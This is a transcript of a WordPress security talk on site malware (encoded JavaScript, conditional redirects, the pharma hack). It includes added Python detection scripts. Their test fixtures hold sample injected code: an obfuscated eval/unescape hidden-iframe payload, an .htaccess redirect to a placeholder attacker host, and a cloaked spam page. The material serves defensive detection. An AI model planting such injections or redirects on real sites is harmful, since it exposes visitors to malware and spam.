Why My Website Sells Viagra


Post on 29-Jan-2015


DESCRIPTION

WordPress End-User Security - WordCamp Atlanta - Dre Armeda, CISSP

TRANSCRIPT

1.

2. DRE ARMEDA, CISSP @DREMEDA

  • CO-FOUNDER AT SUCURI SECURITY
  • ORGANIZER, WORDCAMP SAN DIEGO
  • 12 YEAR NAVY VETERAN
  • 1ST WORDPRESS THEME IN 2005
  • LOVES TACOS
  • DIEHARD CHARGERS FAN
  • RIDES A HARLEY

SUCURI.NET DRE.IM

3.

4. THE WEB IS GROWING

  • Over 2 billion internet users today. 480% growth in the last 11 years. (Internet World Stats)
  • 300 million websites were added to the internet in 2011. (Pingdom)
  • 100,000+ domains gained weekly. (Global Domain Registry)

5. INNOVATION & CREATIVITY

6. 7. 8. 9.

10. IT'S NOT ALL PEACHY

11.

12. WHAT IS MALWARE?

Malware, short for malicious software, is software designed to disrupt computer operation, gather sensitive information, or gain unauthorized access to computer systems.

  • SEO spam, JavaScript & iFrame attacks, and malicious redirects are a few examples of web-based malware.

13.

14. ATTACKERS LOVE YOU

  • Monitor your web browsing and internet usage
  • Forced advertising
  • Redirect affiliate marketing revenue

15. HOW BAD IS IT?

  • Over 2 million new malware strings monthly. (McAfee)
  • Cost to US consumers alone = over $2.3 billion in 2010. (Consumer Reports)
  • Google Safe Browsing issues over 3 million malware warnings a day. (Google)

16.

17. ENCODED JAVASCRIPT

Impact: Website pages may be used to serve malicious downloads to visitors. Those downloads may in turn infect desktop computers and/or steal FTP info.

Typical Entry Point: Outdated, known-vulnerable software; exploited desktop computers; exploited FTP credentials.

JavaScript that is obfuscated (hidden) so that you can't tell what it is. It is injected into files/pages on the site and used to serve malware.

18. ENCODED JAVASCRIPT /wp-admin/js/cat.js CLEAN

19. ENCODED JAVASCRIPT /wp-admin/js/cat.js INFECTED

20. ENCODED JAVASCRIPT /wp-admin/js/cat.js INFECTION DECODED (somewhat)

21. ENCODED JAVASCRIPT

How it works:

  • Attacker scans for known vulnerable software (old WordPress installations, plugins, themes), or the attack stems from an exploited desktop that steals FTP information.
  • A backdoor file is inserted into the environment. This gives the attacker remote access into your world.
  • The payload is inserted into various JavaScript files and/or encoded and hidden in theme and plugin files.
  • You've just enabled your visitors to load fake anti-virus and other "cool" downloads from your site.

22. ENCODED JAVASCRIPT

  • Encoded JavaScript resources:
      • http://www.schillmania.com/content/entries/2009/javascript-malware-obfuscation-analysis
      • http://www.slideshare.net/yusufmotiwala/reverse-engineering-malicious-javascript
      • http://www.infosecisland.com/videos-view/19101-Malware-Analysis-How-to-Decode-JavaScript-Obfuscation.html
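To make the clean / infected / decoded sequence of slides 18-20 concrete, here is an added example (not code from the talk or from Sucuri): a small Python scanner that peels the unescape / String.fromCharCode layers typical of these injections and reports which indicators appear at any layer. The cat.js content, the payload and the host attacker.example are constructed for the example.

```python
import re
import urllib.parse

# Constructed samples, not the cat.js from the talk: a clean helper, and the same
# file with an encoded payload appended. attacker.example is a placeholder host.
PAYLOAD = "document.write(\"<iframe src='http://attacker.example/x' width=0 height=0></iframe>\");"
CLEAN_JS = "function cat(a, b) { return a + b; }\n"
INFECTED_JS = CLEAN_JS + 'eval(unescape("' + urllib.parse.quote(PAYLOAD, safe="") + '"));\n'

# Indicators checked on the raw file and again on every decoded layer.
INDICATORS = {
    "eval": r"\beval\s*\(",
    "unescape": r"\bunescape\s*\(",
    "fromCharCode": r"String\.fromCharCode\s*\(",
    "document.write": r"document\.write\s*\(",
    "iframe": r"<iframe\b",
}

def decode_layer(js):
    """Undo one layer of the two encodings common in these injections; None if absent."""
    m = re.search(r'unescape\(\s*"([^"]*)"\s*\)', js)
    if m:
        return urllib.parse.unquote(m.group(1))
    m = re.search(r"String\.fromCharCode\(\s*([\d\s,]+)\)", js)
    if m:
        return "".join(chr(int(n)) for n in m.group(1).split(","))
    return None

def scan(js, max_layers=5):
    """Return (sorted indicator names, innermost decoded text) for one JS file."""
    layers = [js]
    for _ in range(max_layers):          # peel nested encodings, bounded
        nxt = decode_layer(layers[-1])
        if nxt is None:
            break
        layers.append(nxt)
    found = {name for name, pat in INDICATORS.items()
             for layer in layers if re.search(pat, layer)}
    return sorted(found), layers[-1]

if __name__ == "__main__":
    for label, js in (("clean", CLEAN_JS), ("infected", INFECTED_JS)):
        names, decoded = scan(js)
        print(label + ":", ", ".join(names) or "no indicators")
        if names:
            print("  decoded:", decoded)
```

Run it over every .js file under the site root; a clean file reports no indicators, while the infected sample decodes to a hidden iframe pointing off-site.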

QUICK TIP: Check Google to see if you're infected - site:{yourdomain.com} viagra

23. CONDITIONAL REDIRECTS

Impact: When traffic is coming from a specific referrer (e.g. Google, Bing), the site redirects to a malicious website.

Typical Entry Point: Outdated, known-vulnerable software.

An attack that causes a website to redirect to a malicious website based on referrer, web browser, or operating system.

24. CONDITIONAL REDIRECTS Infected .htaccess file:

25. CONDITIONAL REDIRECTS Result of conditional redirect:

26. CONDITIONAL REDIRECTS

How it works:

  • Attacker scans for known vulnerable software (old WordPress installations, plugins, themes).
  • A backdoor file is inserted into the environment. This gives the attacker remote access into your world.
  • .htaccess entries are created to perform the redirect. Encoded redirect code can also be added to index files.
  • You're now redirecting to some "cool" malware awesomeness.

27. CONDITIONAL REDIRECTS

  • Conditional Redirects resources:
      • http://blog.sucuri.net/2011/11/the-new-and-old-htaccess-attacks-now-using-in-domains.html
      • http://blog.sucuri.net/2010/04/conditional-redirects-or-the-htaccess-malware.html
      • http://sucuri.net/malware-update-timthumb-php-and-htaccess-redirection.html
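As an added example (not from the talk or from Sucuri), here is a Python check for the .htaccess pattern described on slides 23-26: it flags any RewriteRule whose target is an absolute URL on a host you do not own, and lists which request properties (referrer, user agent, cookie) the preceding RewriteCond lines key on, which is what makes the redirect invisible to the owner. The sample .htaccess and the host attacker.example are constructed.

```python
from urllib.parse import urlparse

# Constructed sample (not the infected file from the talk): the stock WordPress
# block followed by an injected redirect. attacker.example is a placeholder host.
SAMPLE_HTACCESS = """\
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} .*Windows.* [NC]
RewriteRule ^(.*)$ http://attacker.example/in.cgi?3 [R=301,L]
"""

# Request properties these attacks key on, so the owner typing the URL directly
# never sees the redirect while search-engine visitors do.
CLOAKING_VARS = ("HTTP_REFERER", "HTTP_USER_AGENT", "HTTP_COOKIE")

def find_conditional_redirects(text, own_hosts):
    """One finding per RewriteRule whose target is an absolute URL on another host."""
    findings, pending = [], []           # pending = RewriteConds awaiting a rule
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if line.startswith("RewriteCond"):
            pending.append(line)
        elif line.startswith("RewriteRule"):
            parts = line.split()
            target = parts[2] if len(parts) > 2 else ""
            host = urlparse(target).hostname
            if host and host not in own_hosts:
                keyed_on = sorted({v for v in CLOAKING_VARS
                                   for c in pending if "%{" + v + "}" in c})
                findings.append({"line": lineno, "target": target,
                                 "keyed_on": keyed_on})
            pending = []                 # a RewriteRule consumes its conditions
    return findings

if __name__ == "__main__":
    for f in find_conditional_redirects(SAMPLE_HTACCESS, {"example.com"}):
        print(f"line {f['line']}: redirect to {f['target']} keyed on {f['keyed_on']}")
```

The stock WordPress rules produce no findings because their targets are local paths; only the injected block is reported.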

28. PHARMA HACK

Impact: Website page and post titles, descriptions and links are changed to display pharmaceutical ads and links back to malicious websites on search engine result pages.

Typical Entry Point: Outdated, known-vulnerable software.

Pharma Hack is a type of SEO poisoning. Attackers manipulate search engine results to make their links appear higher than legitimate results.

29. PHARMA HACK Results of scanning rendered source:

30. PHARMA HACK Google search engine results:

31. PHARMA HACK

How it works:

  • Attacker scans for known vulnerable software (old WordPress installations, plugins, themes).
  • A backdoor file is inserted into the environment. This gives the attacker remote access into your world.
  • A control file is inserted into core application or plugin files. This file acts as the connection from the backdoor to the database.
  • The payload is dropped into the database and... Viva Viagra!

QUICK TIP: Check Google to see if you're infected - site:{yourdomain.com} viagra

32. PHARMA HACK

  • Pharma Hack resources:
      • http://blog.sucuri.net/2010/07/understanding-and-cleaning-the-pharma-hack-on-wordpress.html
      • http://blog.sucuri.net/2011/02/cleaning-up-an-infected-web-site-part-i-wordpress-and-the-pharma-hack.html
      • http://www.pearsonified.com/2010/04/wordpress-pharma-hack.php
      • http://wpdude.com/refreshing-google-index-after-pharma-hack
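An added example (not the talk's own tooling) of the "scan rendered source" step from slide 29, generalised to the cloaking check the quick tip implies: it pulls the title, meta description and off-site links out of two fetches of the same page, reports pharma terms and hidden blocks, and lists the fields that differ between what a browser gets and what a search-engine crawler gets. Both HTML samples, the starter term list and the host pills.attacker.example are constructed.

```python
import re
from html import unescape
from urllib.parse import urlparse

PHARMA_TERMS = ("viagra", "cialis", "pharmacy")   # starter list; extend as needed

# Constructed pages (not the talk's screenshots): the same URL as the owner sees
# it in a browser, and as it is served to a search-engine crawler.
NORMAL_HTML = """<html><head><title>My Tacos Blog</title>
<meta name="description" content="Taco recipes and Harley rides">
</head><body><a href="/about">About</a></body></html>"""
CRAWLER_HTML = """<html><head><title>Buy Viagra Online - My Tacos Blog</title>
<meta name="description" content="Cheap viagra, online pharmacy, no prescription">
</head><body><a href="/about">About</a>
<div style="display:none"><a href="http://pills.attacker.example/v">viagra</a></div>
</body></html>"""

def rendered_summary(html, own_host):
    """Pull the fields Pharma Hack tampers with: title, description, off-site links."""
    title = re.search(r"<title>(.*?)</title>", html, re.I | re.S)
    desc = re.search(r'<meta\s+name="description"\s+content="([^"]*)"', html, re.I)
    links = re.findall(r'href="([^"]+)"', html, re.I)
    return {
        "title": unescape(title.group(1).strip()) if title else "",
        "description": unescape(desc.group(1)) if desc else "",
        "external_links": sorted({l for l in links
                                  if (urlparse(l).hostname or own_host) != own_host}),
    }

def pharma_findings(html, own_host):
    """Indicators the 'scan rendered source' step looks for in one fetched page."""
    s = rendered_summary(html, own_host)
    text = (s["title"] + " " + s["description"]).lower()
    return {"terms": sorted(t for t in PHARMA_TERMS if t in text),
            "hidden_blocks": len(re.findall(r"display\s*:\s*none", html, re.I)),
            "external_links": s["external_links"]}

def compare_views(normal_html, crawler_html, own_host):
    """Cloaking check: fields that differ between a browser fetch and a crawler fetch."""
    a = rendered_summary(normal_html, own_host)
    b = rendered_summary(crawler_html, own_host)
    return {k: (a[k], b[k]) for k in a if a[k] != b[k]}

if __name__ == "__main__":
    print("crawler view:", pharma_findings(CRAWLER_HTML, "example.com"))
    print("differs from browser view in:", sorted(compare_views(NORMAL_HTML, CRAWLER_HTML, "example.com")))
```

In practice the two inputs come from fetching your own URL once with a normal browser User-Agent and once with a search-engine crawler User-Agent; a page that is clean in the browser but differs in the crawler view is the cloaking the slide's Google results show.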

QUICK TIP: Check Google to see if you're infected - site:{yourdomain.com} viagra

33.

34. WHAT IS SECURITY? PROTECTING THINGS OF VALUE FROM HARM'S WAY.

35. HOW & WHY

36. AM I SECURE? The percentage of risk can never be 0! The name of the game is minimizing risk.

37.

38. LOCAL MACHINE

  • Ensure your local machine stays updated
  • Use an anti-virus solution & enable auto-updates
    • Mac - Sophos Anti-Virus for Mac Home Edition
    • Windows - AVG Anti-Virus Free
  • Don't store server credentials on your local machine

39. CONNECT TO YOUR SITE

  • Consider using SFTP or SSH instead of FTP.
  • If you're stuck with FTP:
      • Deny anonymous login
      • Limit connections
  • Practice least privilege
  • Don't store server credentials on your local machine

40. PASSWORDS

  • Change them often
  • Don't write them down, or share them
  • Passwords are like toothbrushes: keep them to yourself, and discard them and get a new one if they have been used by others.
  • Don't use the same password across all your accounts
  • Use a password manager
      • KeePass Password Safe
      • LastPass
      • 1Password

41. WHO HOSTS YOU?

  • CHEAP DOES NOT ALWAYS MEAN BEST, OR SAFEST!
  • DO YOUR RESEARCH!
  • What software are they running? How often do they update?
  • How are server and support credentials stored & who has access? Are they one and the same?
  • What is their malware remediation process?
  • How many of their sites have been infected?
  • http://www.google.com/safebrowsing/diagnostic?site=google.com

42. GARAGE CLEANING

  • IF YOU'RE NOT USING IT, REMOVE IT!
  • UPDATE UPDATE UPDATE UPDATE UPDATE
  • Only load what's needed to get your job done.
  • Check your file and directory permissions.
  • Remove unused user accounts! Practice least privilege.
  • Have you changed your password lately?
  • UPDATE UPDATE UPDATE UPDATE UPDATE

43. 44. BACKUP YOUR WEBSITE

  • NO BACKUPS = BOOOOO!
  • BackupBuddy http://pluginbuddy.com/backupbuddy/
  • VaultPress http://vaultpress.com

45. MALWARE SCAN

  • IS YOUR SITE INFECTED?
  • Unmask Parasites http://unmaskparasites.com
  • Sucuri SiteCheck http://sitecheck.sucuri.net

46. MALWARE CLEAN UP

  • IS YOUR SITE INFECTED?
  • VaultPress http://vaultpress.com
  • Sucuri Security http://sucuri.net

47. WORDPRESS PLUGINS

  • WordPress Exploit Scanner
  • BulletProof Security
  • Login Lockdown
  • Sucuri SiteCheck Malware Scanner

48.